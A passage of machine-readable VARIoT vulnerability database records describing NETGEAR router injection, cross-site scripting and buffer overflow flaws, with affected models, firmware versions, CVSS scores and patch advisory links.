"date": "2024-11-21T03:20:41.837000",
"db": "NVD",
"id": "CVE-2017-18700"
}
]
},
"threat_type": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/threat_type#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "remote",
"sources": [
{
"db": "CNNVD",
"id": "CNNVD-202004-2120"
}
],
"trust": 0.6
},
"title": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/title#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "plural NETGEAR Cross-site scripting vulnerabilities in devices",
"sources": [
{
"db": "JVNDB",
"id": "JVNDB-2017-014967"
}
],
"trust": 0.8
},
"type": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/type#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "XSS",
"sources": [
{
"db": "CNNVD",
"id": "CNNVD-202004-2120"
}
],
"trust": 0.6
}
}
var-202004-1301
Vulnerability from variot
plural NETGEAR A device contains an injection vulnerability.Information is obtained, information is tampered with, and service operation is interrupted. (DoS) It may be put into a state. NETGEAR WNR3500L, etc. are all products of NETGEAR. WNR3500L is a wireless router. NETGEAR D3600 is a wireless modem. NETGEAR D6000 is a wireless modem.
There are injection vulnerabilities in many NETGEAR products, which can be exploited by an attacker to cause the system or product to produce an incorrect interpretation or interpretation method
Show details on source website{
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/VARIoTentry#",
"affected_products": {
"@id": "https://www.variotdbs.pl/ref/affected_products"
},
"configurations": {
"@id": "https://www.variotdbs.pl/ref/configurations"
},
"credits": {
"@id": "https://www.variotdbs.pl/ref/credits"
},
"cvss": {
"@id": "https://www.variotdbs.pl/ref/cvss/"
},
"description": {
"@id": "https://www.variotdbs.pl/ref/description/"
},
"exploit_availability": {
"@id": "https://www.variotdbs.pl/ref/exploit_availability/"
},
"external_ids": {
"@id": "https://www.variotdbs.pl/ref/external_ids/"
},
"iot": {
"@id": "https://www.variotdbs.pl/ref/iot/"
},
"iot_taxonomy": {
"@id": "https://www.variotdbs.pl/ref/iot_taxonomy/"
},
"patch": {
"@id": "https://www.variotdbs.pl/ref/patch/"
},
"problemtype_data": {
"@id": "https://www.variotdbs.pl/ref/problemtype_data/"
},
"references": {
"@id": "https://www.variotdbs.pl/ref/references/"
},
"sources": {
"@id": "https://www.variotdbs.pl/ref/sources/"
},
"sources_release_date": {
"@id": "https://www.variotdbs.pl/ref/sources_release_date/"
},
"sources_update_date": {
"@id": "https://www.variotdbs.pl/ref/sources_update_date/"
},
"threat_type": {
"@id": "https://www.variotdbs.pl/ref/threat_type/"
},
"title": {
"@id": "https://www.variotdbs.pl/ref/title/"
},
"type": {
"@id": "https://www.variotdbs.pl/ref/type/"
}
},
"@id": "https://www.variotdbs.pl/vuln/VAR-202004-1301",
"affected_products": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/affected_products#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
},
"@id": "https://www.variotdbs.pl/ref/sources"
}
},
"data": [
{
"model": "d3600",
"scope": "lt",
"trust": 1.6,
"vendor": "netgear",
"version": "1.0.0.67"
},
{
"model": "d6000",
"scope": "lt",
"trust": 1.6,
"vendor": "netgear",
"version": "1.0.0.67"
},
{
"model": "d6100",
"scope": "lt",
"trust": 1.6,
"vendor": "netgear",
"version": "1.0.0.56"
},
{
"model": "d6200",
"scope": "lt",
"trust": 1.6,
"vendor": "netgear",
"version": "1.1.00.24"
},
{
"model": "d6220",
"scope": "lt",
"trust": 1.6,
"vendor": "netgear",
"version": "1.0.0.32"
},
{
"model": "d6400",
"scope": "lt",
"trust": 1.6,
"vendor": "netgear",
"version": "1.0.0.66"
},
{
"model": "d7000",
"scope": "lt",
"trust": 1.6,
"vendor": "netgear",
"version": "1.0.1.52"
},
{
"model": "d7800",
"scope": "lt",
"trust": 1.6,
"vendor": "netgear",
"version": "1.0.1.30"
},
{
"model": "d8500",
"scope": "lt",
"trust": 1.6,
"vendor": "netgear",
"version": "1.0.3.35"
},
{
"model": "ex2700",
"scope": "lt",
"trust": 1.6,
"vendor": "netgear",
"version": "1.0.1.28"
},
{
"model": "ex6400",
"scope": "lt",
"trust": 1.6,
"vendor": "netgear",
"version": "1.0.1.72"
},
{
"model": "ex7300",
"scope": "lt",
"trust": 1.6,
"vendor": "netgear",
"version": "1.0.1.72"
},
{
"model": "ex8000",
"scope": "lt",
"trust": 1.6,
"vendor": "netgear",
"version": "1.0.0.102"
},
{
"model": "pr2000",
"scope": "lt",
"trust": 1.6,
"vendor": "netgear",
"version": "1.0.0.20"
},
{
"model": "r6100",
"scope": "lt",
"trust": 1.6,
"vendor": "netgear",
"version": "1.0.1.20"
},
{
"model": "r6250",
"scope": "lt",
"trust": 1.6,
"vendor": "netgear",
"version": "1.0.4.16"
},
{
"model": "r6400",
"scope": "lt",
"trust": 1.6,
"vendor": "netgear",
"version": "1.0.1.32"
},
{
"model": "r6700",
"scope": "lt",
"trust": 1.6,
"vendor": "netgear",
"version": "1.0.1.36"
},
{
"model": "r6900",
"scope": "lt",
"trust": 1.6,
"vendor": "netgear",
"version": "1.0.1.34"
},
{
"model": "r7000",
"scope": "lt",
"trust": 1.6,
"vendor": "netgear",
"version": "1.0.9.18"
},
{
"model": "r6900p",
"scope": "lt",
"trust": 1.6,
"vendor": "netgear",
"version": "1.3.0.8"
},
{
"model": "r7000p",
"scope": "lt",
"trust": 1.6,
"vendor": "netgear",
"version": "1.3.0.8"
},
{
"model": "r7100lg",
"scope": "lt",
"trust": 1.6,
"vendor": "netgear",
"version": "1.0.0.34"
},
{
"model": "r7300dst",
"scope": "lt",
"trust": 1.6,
"vendor": "netgear",
"version": "1.0.0.58"
},
{
"model": "r7500",
"scope": "lt",
"trust": 1.6,
"vendor": "netgear",
"version": "1.0.0.118"
},
{
"model": "r7800",
"scope": "lt",
"trust": 1.6,
"vendor": "netgear",
"version": "1.0.2.40"
},
{
"model": "r7900",
"scope": "lt",
"trust": 1.6,
"vendor": "netgear",
"version": "1.0.2.4"
},
{
"model": "r7900p",
"scope": "lt",
"trust": 1.6,
"vendor": "netgear",
"version": "1.1.5.14"
},
{
"model": "r8000p",
"scope": "lt",
"trust": 1.6,
"vendor": "netgear",
"version": "1.1.5.14"
},
{
"model": "r8300",
"scope": "lt",
"trust": 1.6,
"vendor": "netgear",
"version": "1.0.2.110"
},
{
"model": "r8500",
"scope": "lt",
"trust": 1.6,
"vendor": "netgear",
"version": "1.0.2.110"
},
{
"model": "r9000",
"scope": "lt",
"trust": 1.6,
"vendor": "netgear",
"version": "1.0.2.52"
},
{
"model": "wndr4300",
"scope": "lt",
"trust": 1.6,
"vendor": "netgear",
"version": "1.0.2.96"
},
{
"model": "wnr2020",
"scope": "lt",
"trust": 1.6,
"vendor": "netgear",
"version": "1.1.0.44"
},
{
"model": "wnr2050",
"scope": "lt",
"trust": 1.6,
"vendor": "netgear",
"version": "1.1.0.44"
},
{
"model": "r7500",
"scope": "lt",
"trust": 1.0,
"vendor": "netgear",
"version": "1.0.3.24"
},
{
"model": "wndr4300",
"scope": "lt",
"trust": 1.0,
"vendor": "netgear",
"version": "1.0.0.50"
},
{
"model": "wnr1000",
"scope": "lt",
"trust": 1.0,
"vendor": "netgear",
"version": "1.1.0.44"
},
{
"model": "wn3100rp",
"scope": "lt",
"trust": 1.0,
"vendor": "netgear",
"version": "1.0.0.40"
},
{
"model": "jnr1010",
"scope": "lt",
"trust": 1.0,
"vendor": "netgear",
"version": "1.1.0.44"
},
{
"model": "r8000",
"scope": "lt",
"trust": 1.0,
"vendor": "netgear",
"version": "1.0.4.4_1.1.42"
},
{
"model": "r6300",
"scope": "lt",
"trust": 1.0,
"vendor": "netgear",
"version": "1.0.4.18"
},
{
"model": "dgn2200",
"scope": "lt",
"trust": 1.0,
"vendor": "netgear",
"version": "1.0.0.96"
},
{
"model": "jwnr2010",
"scope": "lt",
"trust": 1.0,
"vendor": "netgear",
"version": "1.1.0.44"
},
{
"model": "wndr3700",
"scope": "lt",
"trust": 1.0,
"vendor": "netgear",
"version": "1.0.2.94"
},
{
"model": "ex6200",
"scope": "lt",
"trust": 1.0,
"vendor": "netgear",
"version": "1.0.1.52"
},
{
"model": "wnr2000",
"scope": "lt",
"trust": 1.0,
"vendor": "netgear",
"version": "1.0.0.62"
},
{
"model": "wn2000rpt",
"scope": "lt",
"trust": 1.0,
"vendor": "netgear",
"version": "1.0.1.14"
},
{
"model": "wnr3500l",
"scope": "lt",
"trust": 1.0,
"vendor": "netgear",
"version": "1.2.0.46"
},
{
"model": "wn3000rp",
"scope": "lt",
"trust": 1.0,
"vendor": "netgear",
"version": "1.0.2.50"
},
{
"model": "ex6100",
"scope": "lt",
"trust": 1.0,
"vendor": "netgear",
"version": "1.0.1.54"
},
{
"model": "dgn2200b",
"scope": "lt",
"trust": 1.0,
"vendor": "netgear",
"version": "1.0.0.96"
},
{
"model": "ex6150",
"scope": "lt",
"trust": 1.0,
"vendor": "netgear",
"version": "1.0.1.54"
},
{
"model": "wndr4500",
"scope": "lt",
"trust": 1.0,
"vendor": "netgear",
"version": "1.0.0.50"
},
{
"model": "d7000",
"scope": "lt",
"trust": 1.0,
"vendor": "netgear",
"version": "1.0.0.44"
},
{
"model": "r6400",
"scope": "lt",
"trust": 1.0,
"vendor": "netgear",
"version": "1.0.2.46"
},
{
"model": "wndr3400",
"scope": "lt",
"trust": 1.0,
"vendor": "netgear",
"version": "1.0.1.16"
},
{
"model": "d3600",
"scope": "eq",
"trust": 0.8,
"vendor": "netgear",
"version": "1.0.0.67"
},
{
"model": "d6000",
"scope": "eq",
"trust": 0.8,
"vendor": "netgear",
"version": "1.0.0.67"
},
{
"model": "d6100",
"scope": "eq",
"trust": 0.8,
"vendor": "netgear",
"version": "1.0.0.56"
},
{
"model": "d6200",
"scope": "eq",
"trust": 0.8,
"vendor": "netgear",
"version": "1.1.00.24"
},
{
"model": "d6220",
"scope": "eq",
"trust": 0.8,
"vendor": "netgear",
"version": "1.0.0.32"
},
{
"model": "d6400",
"scope": "eq",
"trust": 0.8,
"vendor": "netgear",
"version": "1.0.0.66"
},
{
"model": "d7000",
"scope": "eq",
"trust": 0.8,
"vendor": "netgear",
"version": "1.0.0.44"
},
{
"model": "d7000",
"scope": "eq",
"trust": 0.8,
"vendor": "netgear",
"version": "1.0.1.52"
},
{
"model": "d7800",
"scope": "eq",
"trust": 0.8,
"vendor": "netgear",
"version": "1.0.1.30"
},
{
"model": "d8500",
"scope": "eq",
"trust": 0.8,
"vendor": "netgear",
"version": "1.0.3.35"
},
{
"model": "d7000v2",
"scope": "lt",
"trust": 0.6,
"vendor": "netgear",
"version": "1.0.0.44"
},
{
"model": "dgn2200v4",
"scope": "lt",
"trust": 0.6,
"vendor": "netgear",
"version": "1.0.0.96"
},
{
"model": "dgn2200bv4",
"scope": "lt",
"trust": 0.6,
"vendor": "netgear",
"version": "1.0.0.96"
},
{
"model": "ex6150v2",
"scope": "lt",
"trust": 0.6,
"vendor": "netgear",
"version": "1.0.1.54"
},
{
"model": "ex6100v2",
"scope": "lt",
"trust": 0.6,
"vendor": "netgear",
"version": "1.0.1.54"
},
{
"model": "ex6200v2",
"scope": "lt",
"trust": 0.6,
"vendor": "netgear",
"version": "1.0.1.52"
},
{
"model": "jnr1010v2",
"scope": "lt",
"trust": 0.6,
"vendor": "netgear",
"version": "1.1.0.44"
},
{
"model": "jwnr2010v5",
"scope": "lt",
"trust": 0.6,
"vendor": "netgear",
"version": "1.1.0.44"
},
{
"model": "r6300v2",
"scope": "lt",
"trust": 0.6,
"vendor": "netgear",
"version": "1.0.4.18"
},
{
"model": "r6400v2",
"scope": "lt",
"trust": 0.6,
"vendor": "netgear",
"version": "1.0.2.46"
},
{
"model": "r7500v2",
"scope": "lt",
"trust": 0.6,
"vendor": "netgear",
"version": "1.0.3.24"
},
{
"model": "r8000 \u003c1.0.4.4 1.1.42",
"scope": null,
"trust": 0.6,
"vendor": "netgear",
"version": null
},
{
"model": "wn2000rptv3",
"scope": "lt",
"trust": 0.6,
"vendor": "netgear",
"version": "1.0.1.14"
},
{
"model": "wn3000rpv3",
"scope": "lt",
"trust": 0.6,
"vendor": "netgear",
"version": "1.0.2.50"
},
{
"model": "wn3100rpv2",
"scope": "lt",
"trust": 0.6,
"vendor": "netgear",
"version": "1.0.0.40"
},
{
"model": "wndr3400v3",
"scope": "lt",
"trust": 0.6,
"vendor": "netgear",
"version": "1.0.1.16"
},
{
"model": "wndr3700v4",
"scope": "lt",
"trust": 0.6,
"vendor": "netgear",
"version": "1.0.2.94"
},
{
"model": "wndr4300v2",
"scope": "lt",
"trust": 0.6,
"vendor": "netgear",
"version": "1.0.0.50"
},
{
"model": "wndr4500v3",
"scope": "lt",
"trust": 0.6,
"vendor": "netgear",
"version": "1.0.0.50"
},
{
"model": "wnr1000v4",
"scope": "lt",
"trust": 0.6,
"vendor": "netgear",
"version": "1.1.0.44"
},
{
"model": "wnr2000v5",
"scope": "lt",
"trust": 0.6,
"vendor": "netgear",
"version": "1.0.0.62"
},
{
"model": "wnr3500lv2",
"scope": "lt",
"trust": 0.6,
"vendor": "netgear",
"version": "1.2.0.46"
}
],
"sources": [
{
"db": "CNVD",
"id": "CNVD-2020-31315"
},
{
"db": "JVNDB",
"id": "JVNDB-2017-014874"
},
{
"db": "NVD",
"id": "CVE-2017-18788"
}
]
},
"configurations": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/configurations#",
"children": {
"@container": "@list"
},
"cpe_match": {
"@container": "@list"
},
"data": {
"@container": "@list"
},
"nodes": {
"@container": "@list"
}
},
"data": [
{
"CVE_data_version": "4.0",
"nodes": [
{
"cpe_match": [
{
"cpe22Uri": "cpe:/o:netgear:d3600_firmware",
"vulnerable": true
},
{
"cpe22Uri": "cpe:/o:netgear:d6000_firmware",
"vulnerable": true
},
{
"cpe22Uri": "cpe:/o:netgear:d6100_firmware",
"vulnerable": true
},
{
"cpe22Uri": "cpe:/o:netgear:d6200_firmware",
"vulnerable": true
},
{
"cpe22Uri": "cpe:/o:netgear:d6220_firmware",
"vulnerable": true
},
{
"cpe22Uri": "cpe:/o:netgear:d6400_firmware",
"vulnerable": true
},
{
"cpe22Uri": "cpe:/o:netgear:d7000_firmware",
"vulnerable": true
},
{
"cpe22Uri": "cpe:/o:netgear:d7800_firmware",
"vulnerable": true
},
{
"cpe22Uri": "cpe:/o:netgear:d8500_firmware",
"vulnerable": true
}
],
"operator": "OR"
}
]
}
],
"sources": [
{
"db": "JVNDB",
"id": "JVNDB-2017-014874"
}
]
},
"cve": "CVE-2017-18788",
"cvss": {
"@context": {
"cvssV2": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/cvss/cvssV2#"
},
"@id": "https://www.variotdbs.pl/ref/cvss/cvssV2"
},
"cvssV3": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/cvss/cvssV3#"
},
"@id": "https://www.variotdbs.pl/ref/cvss/cvssV3/"
},
"severity": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/cvss/severity#"
},
"@id": "https://www.variotdbs.pl/ref/cvss/severity"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
},
"@id": "https://www.variotdbs.pl/ref/sources"
}
},
"data": [
{
"cvssV2": [
{
"accessComplexity": "LOW",
"accessVector": "LOCAL",
"authentication": "NONE",
"author": "nvd@nist.gov",
"availabilityImpact": "PARTIAL",
"baseScore": 4.6,
"confidentialityImpact": "PARTIAL",
"exploitabilityScore": 3.9,
"id": "CVE-2017-18788",
"impactScore": 6.4,
"integrityImpact": "PARTIAL",
"severity": "MEDIUM",
"trust": 1.0,
"vectorString": "AV:L/AC:L/Au:N/C:P/I:P/A:P",
"version": "2.0"
},
{
"acInsufInfo": null,
"accessComplexity": "Low",
"accessVector": "Local",
"authentication": "None",
"author": "NVD",
"availabilityImpact": "Partial",
"baseScore": 4.6,
"confidentialityImpact": "Partial",
"exploitabilityScore": null,
"id": "JVNDB-2017-014874",
"impactScore": null,
"integrityImpact": "Partial",
"obtainAllPrivilege": null,
"obtainOtherPrivilege": null,
"obtainUserPrivilege": null,
"severity": "Medium",
"trust": 0.8,
"userInteractionRequired": null,
"vectorString": "AV:L/AC:L/Au:N/C:P/I:P/A:P",
"version": "2.0"
},
{
"accessComplexity": "LOW",
"accessVector": "LOCAL",
"authentication": "NONE",
"author": "CNVD",
"availabilityImpact": "PARTIAL",
"baseScore": 4.6,
"confidentialityImpact": "PARTIAL",
"exploitabilityScore": 3.9,
"id": "CNVD-2020-31315",
"impactScore": 6.4,
"integrityImpact": "PARTIAL",
"severity": "MEDIUM",
"trust": 0.6,
"vectorString": "AV:L/AC:L/Au:N/C:P/I:P/A:P",
"version": "2.0"
}
],
"cvssV3": [
{
"attackComplexity": "LOW",
"attackVector": "LOCAL",
"author": "nvd@nist.gov",
"availabilityImpact": "HIGH",
"baseScore": 6.7,
"baseSeverity": "MEDIUM",
"confidentialityImpact": "HIGH",
"exploitabilityScore": 0.8,
"id": "CVE-2017-18788",
"impactScore": 5.9,
"integrityImpact": "HIGH",
"privilegesRequired": "HIGH",
"scope": "UNCHANGED",
"trust": 1.0,
"userInteraction": "NONE",
"vectorString": "CVSS:3.1/AV:L/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H",
"version": "3.1"
},
{
"attackComplexity": "LOW",
"attackVector": "LOCAL",
"author": "cve@mitre.org",
"availabilityImpact": "HIGH",
"baseScore": 6.7,
"baseSeverity": "MEDIUM",
"confidentialityImpact": "HIGH",
"exploitabilityScore": 0.8,
"id": "CVE-2017-18788",
"impactScore": 5.9,
"integrityImpact": "HIGH",
"privilegesRequired": "HIGH",
"scope": "UNCHANGED",
"trust": 1.0,
"userInteraction": "NONE",
"vectorString": "CVSS:3.0/AV:L/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H",
"version": "3.0"
},
{
"attackComplexity": "Low",
"attackVector": "Local",
"author": "NVD",
"availabilityImpact": "High",
"baseScore": 6.7,
"baseSeverity": "Medium",
"confidentialityImpact": "High",
"exploitabilityScore": null,
"id": "JVNDB-2017-014874",
"impactScore": null,
"integrityImpact": "High",
"privilegesRequired": "High",
"scope": "Unchanged",
"trust": 0.8,
"userInteraction": "None",
"vectorString": "CVSS:3.0/AV:L/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H",
"version": "3.0"
}
],
"severity": [
{
"author": "nvd@nist.gov",
"id": "CVE-2017-18788",
"trust": 1.0,
"value": "MEDIUM"
},
{
"author": "cve@mitre.org",
"id": "CVE-2017-18788",
"trust": 1.0,
"value": "MEDIUM"
},
{
"author": "NVD",
"id": "JVNDB-2017-014874",
"trust": 0.8,
"value": "Medium"
},
{
"author": "CNVD",
"id": "CNVD-2020-31315",
"trust": 0.6,
"value": "MEDIUM"
},
{
"author": "CNNVD",
"id": "CNNVD-202004-1863",
"trust": 0.6,
"value": "MEDIUM"
}
]
}
],
"sources": [
{
"db": "CNVD",
"id": "CNVD-2020-31315"
},
{
"db": "JVNDB",
"id": "JVNDB-2017-014874"
},
{
"db": "CNNVD",
"id": "CNNVD-202004-1863"
},
{
"db": "NVD",
"id": "CVE-2017-18788"
},
{
"db": "NVD",
"id": "CVE-2017-18788"
}
]
},
"description": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/description#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "plural NETGEAR A device contains an injection vulnerability.Information is obtained, information is tampered with, and service operation is interrupted. (DoS) It may be put into a state. NETGEAR WNR3500L, etc. are all products of NETGEAR. WNR3500L is a wireless router. NETGEAR D3600 is a wireless modem. NETGEAR D6000 is a wireless modem. \n\r\n\r\nThere are injection vulnerabilities in many NETGEAR products, which can be exploited by an attacker to cause the system or product to produce an incorrect interpretation or interpretation method",
"sources": [
{
"db": "JVNDB",
"id": "JVNDB-2017-014874"
},
{
"db": "CNVD",
"id": "CNVD-2020-31315"
}
],
"trust": 1.26
},
"external_ids": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/external_ids#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"db": "NVD",
"id": "CVE-2017-18788",
"trust": 3.0
},
{
"db": "JVNDB",
"id": "JVNDB-2017-014874",
"trust": 0.8
},
{
"db": "CNVD",
"id": "CNVD-2020-31315",
"trust": 0.6
},
{
"db": "CNNVD",
"id": "CNNVD-202004-1863",
"trust": 0.6
}
],
"sources": [
{
"db": "CNVD",
"id": "CNVD-2020-31315"
},
{
"db": "JVNDB",
"id": "JVNDB-2017-014874"
},
{
"db": "CNNVD",
"id": "CNNVD-202004-1863"
},
{
"db": "NVD",
"id": "CVE-2017-18788"
}
]
},
"id": "VAR-202004-1301",
"iot": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/iot#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": true,
"sources": [
{
"db": "CNVD",
"id": "CNVD-2020-31315"
}
],
"trust": 1.1754130904918032
},
"iot_taxonomy": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/iot_taxonomy#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"category": [
"Network device"
],
"sub_category": null,
"trust": 0.6
}
],
"sources": [
{
"db": "CNVD",
"id": "CNVD-2020-31315"
}
]
},
"last_update_date": "2024-11-23T22:37:25.142000Z",
"patch": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/patch#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"title": "Security Advisory for Post Authentication Command Injection on Some Routers, Gateways, and Extenders, PSV-2017-2947",
"trust": 0.8,
"url": "https://kb.netgear.com/000049527/Security-Advisory-for-Post-Authentication-Command-Injection-on-Some-Routers-Gateways-and-Extenders-PSV-2017-2947"
},
{
"title": "Patch for Multiple NETGEAR product injection vulnerabilities (CNVD-2020-31315)",
"trust": 0.6,
"url": "https://www.cnvd.org.cn/patchInfo/show/220097"
},
{
"title": "Multiple NETGEAR Fixing measures for product injection vulnerabilities",
"trust": 0.6,
"url": "http://www.cnnvd.org.cn/web/xxk/bdxqById.tag?id=116999"
}
],
"sources": [
{
"db": "CNVD",
"id": "CNVD-2020-31315"
},
{
"db": "JVNDB",
"id": "JVNDB-2017-014874"
},
{
"db": "CNNVD",
"id": "CNNVD-202004-1863"
}
]
},
"problemtype_data": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/problemtype_data#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"problemtype": "CWE-74",
"trust": 1.8
}
],
"sources": [
{
"db": "JVNDB",
"id": "JVNDB-2017-014874"
},
{
"db": "NVD",
"id": "CVE-2017-18788"
}
]
},
"references": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/references#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"trust": 2.0,
"url": "https://nvd.nist.gov/vuln/detail/cve-2017-18788"
},
{
"trust": 1.6,
"url": "https://kb.netgear.com/000049527/security-advisory-for-post-authentication-command-injection-on-some-routers-gateways-and-extenders-psv-2017-2947"
},
{
"trust": 0.8,
"url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2017-18788"
}
],
"sources": [
{
"db": "CNVD",
"id": "CNVD-2020-31315"
},
{
"db": "JVNDB",
"id": "JVNDB-2017-014874"
},
{
"db": "CNNVD",
"id": "CNNVD-202004-1863"
},
{
"db": "NVD",
"id": "CVE-2017-18788"
}
]
},
"sources": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#",
"data": {
"@container": "@list"
}
},
"data": [
{
"db": "CNVD",
"id": "CNVD-2020-31315"
},
{
"db": "JVNDB",
"id": "JVNDB-2017-014874"
},
{
"db": "CNNVD",
"id": "CNNVD-202004-1863"
},
{
"db": "NVD",
"id": "CVE-2017-18788"
}
]
},
"sources_release_date": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources_release_date#",
"data": {
"@container": "@list"
}
},
"data": [
{
"date": "2020-06-03T00:00:00",
"db": "CNVD",
"id": "CNVD-2020-31315"
},
{
"date": "2020-05-20T00:00:00",
"db": "JVNDB",
"id": "JVNDB-2017-014874"
},
{
"date": "2020-04-22T00:00:00",
"db": "CNNVD",
"id": "CNNVD-202004-1863"
},
{
"date": "2020-04-22T14:15:11.817000",
"db": "NVD",
"id": "CVE-2017-18788"
}
]
},
"sources_update_date": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources_update_date#",
"data": {
"@container": "@list"
}
},
"data": [
{
"date": "2020-06-03T00:00:00",
"db": "CNVD",
"id": "CNVD-2020-31315"
},
{
"date": "2020-05-20T00:00:00",
"db": "JVNDB",
"id": "JVNDB-2017-014874"
},
{
"date": "2020-04-24T00:00:00",
"db": "CNNVD",
"id": "CNNVD-202004-1863"
},
{
"date": "2024-11-21T03:20:55.460000",
"db": "NVD",
"id": "CVE-2017-18788"
}
]
},
"threat_type": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/threat_type#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "local",
"sources": [
{
"db": "CNNVD",
"id": "CNNVD-202004-1863"
}
],
"trust": 0.6
},
"title": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/title#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "plural NETGEAR Injection vulnerabilities in devices",
"sources": [
{
"db": "JVNDB",
"id": "JVNDB-2017-014874"
}
],
"trust": 0.8
},
"type": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/type#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "injection",
"sources": [
{
"db": "CNNVD",
"id": "CNNVD-202004-1863"
}
],
"trust": 0.6
}
}
var-202004-1348
Vulnerability from variot
Certain NETGEAR devices are affected by a buffer overflow by an unauthenticated attacker. This affects R6250 before 1.0.4.12, R6300v2 before 1.0.4.12, R6700 before 1.0.1.22, R6900 before 1.0.1.22, R7000 before 1.0.9.4, R7900 before 1.0.1.12, R8000 before 1.0.3.24, and R8500 before 1.0.2.74. plural NETGEAR A classic buffer overflow vulnerability exists on the device.Information is obtained, information is tampered with, and service operation is interrupted. (DoS) It may be put into a state. NETGEAR R6250, etc. are all wireless routers from NETGEAR. The vulnerability stems from the fact that when the network system or product performs operations on the memory, the data boundary is not correctly verified, resulting in incorrect read and write operations to other associated memory locations
Show details on source website{
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/VARIoTentry#",
"affected_products": {
"@id": "https://www.variotdbs.pl/ref/affected_products"
},
"configurations": {
"@id": "https://www.variotdbs.pl/ref/configurations"
},
"credits": {
"@id": "https://www.variotdbs.pl/ref/credits"
},
"cvss": {
"@id": "https://www.variotdbs.pl/ref/cvss/"
},
"description": {
"@id": "https://www.variotdbs.pl/ref/description/"
},
"exploit_availability": {
"@id": "https://www.variotdbs.pl/ref/exploit_availability/"
},
"external_ids": {
"@id": "https://www.variotdbs.pl/ref/external_ids/"
},
"iot": {
"@id": "https://www.variotdbs.pl/ref/iot/"
},
"iot_taxonomy": {
"@id": "https://www.variotdbs.pl/ref/iot_taxonomy/"
},
"patch": {
"@id": "https://www.variotdbs.pl/ref/patch/"
},
"problemtype_data": {
"@id": "https://www.variotdbs.pl/ref/problemtype_data/"
},
"references": {
"@id": "https://www.variotdbs.pl/ref/references/"
},
"sources": {
"@id": "https://www.variotdbs.pl/ref/sources/"
},
"sources_release_date": {
"@id": "https://www.variotdbs.pl/ref/sources_release_date/"
},
"sources_update_date": {
"@id": "https://www.variotdbs.pl/ref/sources_update_date/"
},
"threat_type": {
"@id": "https://www.variotdbs.pl/ref/threat_type/"
},
"title": {
"@id": "https://www.variotdbs.pl/ref/title/"
},
"type": {
"@id": "https://www.variotdbs.pl/ref/type/"
}
},
"@id": "https://www.variotdbs.pl/vuln/VAR-202004-1348",
"affected_products": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/affected_products#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
},
"@id": "https://www.variotdbs.pl/ref/sources"
}
},
"data": [
{
"model": "r6700",
"scope": "lt",
"trust": 1.6,
"vendor": "netgear",
"version": "1.0.1.22"
},
{
"model": "r6900",
"scope": "lt",
"trust": 1.6,
"vendor": "netgear",
"version": "1.0.1.22"
},
{
"model": "r7900",
"scope": "lt",
"trust": 1.6,
"vendor": "netgear",
"version": "1.0.1.12"
},
{
"model": "r8000",
"scope": "lt",
"trust": 1.6,
"vendor": "netgear",
"version": "1.0.3.24"
},
{
"model": "r8500",
"scope": "lt",
"trust": 1.6,
"vendor": "netgear",
"version": "1.0.2.74"
},
{
"model": "r6250",
"scope": "lt",
"trust": 1.6,
"vendor": "netgear",
